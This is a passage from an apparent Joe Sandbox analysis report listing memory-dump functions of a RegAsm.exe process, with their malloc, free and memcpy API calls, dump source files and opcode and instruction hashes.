                                                                                    • free.MOZGLUE(?), ref: 6C725A97
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000010), ref: 6C725B9D
                                                                                    Similarity
                                                                                    • API ID: free$mallocmemset
                                                                                    • String ID:
                                                                                    • API String ID: 2682772760-0
                                                                                    APIs
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C71B2C9,?,?,?,6C71B127,?,?,?,?,?,?,?,?,?,6C71AE52), ref: 6C71B628
                                                                                      • Part of subcall function 6C7190E0: free.MOZGLUE(?,00000000,?,?,6C71DEDB), ref: 6C7190FF
                                                                                      • Part of subcall function 6C7190E0: free.MOZGLUE(?,00000000,?,?,6C71DEDB), ref: 6C719108
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C71B2C9,?,?,?,6C71B127,?,?,?,?,?,?,?,?,?,6C71AE52), ref: 6C71B67D
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C71B2C9,?,?,?,6C71B127,?,?,?,?,?,?,?,?,?,6C71AE52), ref: 6C71B708
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C71B127,?,?,?,?,?,?,?,?), ref: 6C71B74D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: freemalloc
                                                                                    • String ID:
                                                                                    • API String ID: 3061335427-0
                                                                                    • Opcode ID: 6f51a42cb0a801bfe551c920bdf2e57b0e6806818c65c35996cd608fde9965e3
                                                                                    • Instruction ID: 7f2fddaa003840db879fd521ea0f07be0152236aba7f9c852f9d594c3829ee2f
                                                                                    • Opcode Fuzzy Hash: 6f51a42cb0a801bfe551c920bdf2e57b0e6806818c65c35996cd608fde9965e3
                                                                                    • Instruction Fuzzy Hash: 5651D4F1A092168FDB14CF28CA8475EB7B5FF49305F59852EC856A7B11D731B804CBA1
                                                                                    APIs
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C70FF2A), ref: 6C71DFFD
                                                                                      • Part of subcall function 6C7190E0: free.MOZGLUE(?,00000000,?,?,6C71DEDB), ref: 6C7190FF
                                                                                      • Part of subcall function 6C7190E0: free.MOZGLUE(?,00000000,?,?,6C71DEDB), ref: 6C719108
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C70FF2A), ref: 6C71E04A
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C70FF2A), ref: 6C71E0C0
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6C70FF2A), ref: 6C71E0FE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: freemalloc
                                                                                    • String ID:
                                                                                    • API String ID: 3061335427-0
                                                                                    • Opcode ID: 7933647992c59db80bca6eca4dafb3ed924e47acccffc1ad1b4d2d06149fa5bd
                                                                                    • Instruction ID: 1fdf80d256ddfef3e7bc22570dc71b3c5f312dff79af4ccbcf341b1c885693d0
                                                                                    • Opcode Fuzzy Hash: 7933647992c59db80bca6eca4dafb3ed924e47acccffc1ad1b4d2d06149fa5bd
                                                                                    • Instruction Fuzzy Hash: 7D41D4B160820A8FEB14CF68CA8435E73B2BB45308F2D4539D556DBF41E732E905CBA2
                                                                                    APIs
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6C716EAB
                                                                                    • memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6C716EFA
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C716F1E
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C716F5C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: malloc$freememcpy
                                                                                    • String ID:
                                                                                    • API String ID: 4259248891-0
                                                                                    • Opcode ID: 499b74ea4c0f937561fbd6046930633301652a75b16e8ba6d92ad0ee87836f0f
                                                                                    • Instruction ID: 742806e055a1f3dcb15149b05868d4f11460ead6f41dc9db0ac86849fcfbf4dc
                                                                                    • Opcode Fuzzy Hash: 499b74ea4c0f937561fbd6046930633301652a75b16e8ba6d92ad0ee87836f0f
                                                                                    • Instruction Fuzzy Hash: C031E771A1460A8FDB04CF2CCE406AA73EDFB84305F548239D41AC7A61EB31E659C7A0
                                                                                    APIs
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C6D0A4D), ref: 6C72B5EA
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6C6D0A4D), ref: 6C72B623
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C6D0A4D), ref: 6C72B66C
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,6C6D0A4D), ref: 6C72B67F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: malloc$free
                                                                                    • String ID:
                                                                                    • API String ID: 1480856625-0
                                                                                    • Opcode ID: e906c06632f40bb3ce69b36a802506ecd3f6501474bca7b08db6c27144fb0aed
                                                                                    • Instruction ID: 9f3990d580deb3525ab1da07e375ef1d601240b01ba6c1df7a66bd5f5a2a8873
                                                                                    • Opcode Fuzzy Hash: e906c06632f40bb3ce69b36a802506ecd3f6501474bca7b08db6c27144fb0aed
                                                                                    • Instruction Fuzzy Hash: C231F471A002168FDB10DF68C944A5ABBB5FF80305F1A857AC8179B211DB35F915CBA1
                                                                                    APIs
                                                                                    • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C6FF611
                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C6FF623
                                                                                    • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C6FF652
                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C6FF668
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memcpy
                                                                                    • String ID:
                                                                                    • API String ID: 3510742995-0
                                                                                    • Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                                    • Instruction ID: 5d8f98b3ecbf1bda9c0c7852c1e9f49d0163ae472f56b4525ef4823fc38e83fc
                                                                                    • Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                                    • Instruction Fuzzy Hash: A1316F71A00224AFCB14CF2DCCC4A9F77F6EB94354B148538FA598BB05D631E945CB95
                                                                                    APIs
                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C6DB96F
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020), ref: 6C6DB99A
                                                                                    • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C6DB9B0
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6DB9B9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memcpy$freemalloc
                                                                                    • String ID:
                                                                                    • API String ID: 3313557100-0
                                                                                    • Opcode ID: ed109c27f1ca70179d5eeceadf1b9e57eef4a3adfb2f378d8b895fde0a29aed7
                                                                                    • Instruction ID: b17e86e85fd9cca8e13f9fb80b29c13965112f525bb24a8dba04e4ae02719fa8
                                                                                    • Opcode Fuzzy Hash: ed109c27f1ca70179d5eeceadf1b9e57eef4a3adfb2f378d8b895fde0a29aed7
                                                                                    • Instruction Fuzzy Hash: 1611ACB1A002159FCB04DF69DC848ABB7F8BF98304B14853AE91AD7301E731A9098AA1
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free
                                                                                    • String ID:
                                                                                    • API String ID: 1294909896-0
                                                                                    • Opcode ID: 4f6dc11650bb138c8c710571b58d91105961ae96d31e2712763e930c73edeeb3
                                                                                    • Instruction ID: d12ae484c45080c8806240e31b7bf2cdba3584a77214820ea1a8bb66f3a39d0d
                                                                                    • Opcode Fuzzy Hash: 4f6dc11650bb138c8c710571b58d91105961ae96d31e2712763e930c73edeeb3
                                                                                    • Instruction Fuzzy Hash: D9F02DB27052005BE7109E18DC8495B73ADEF5731DB180035EA16D3F12E332F919C7A5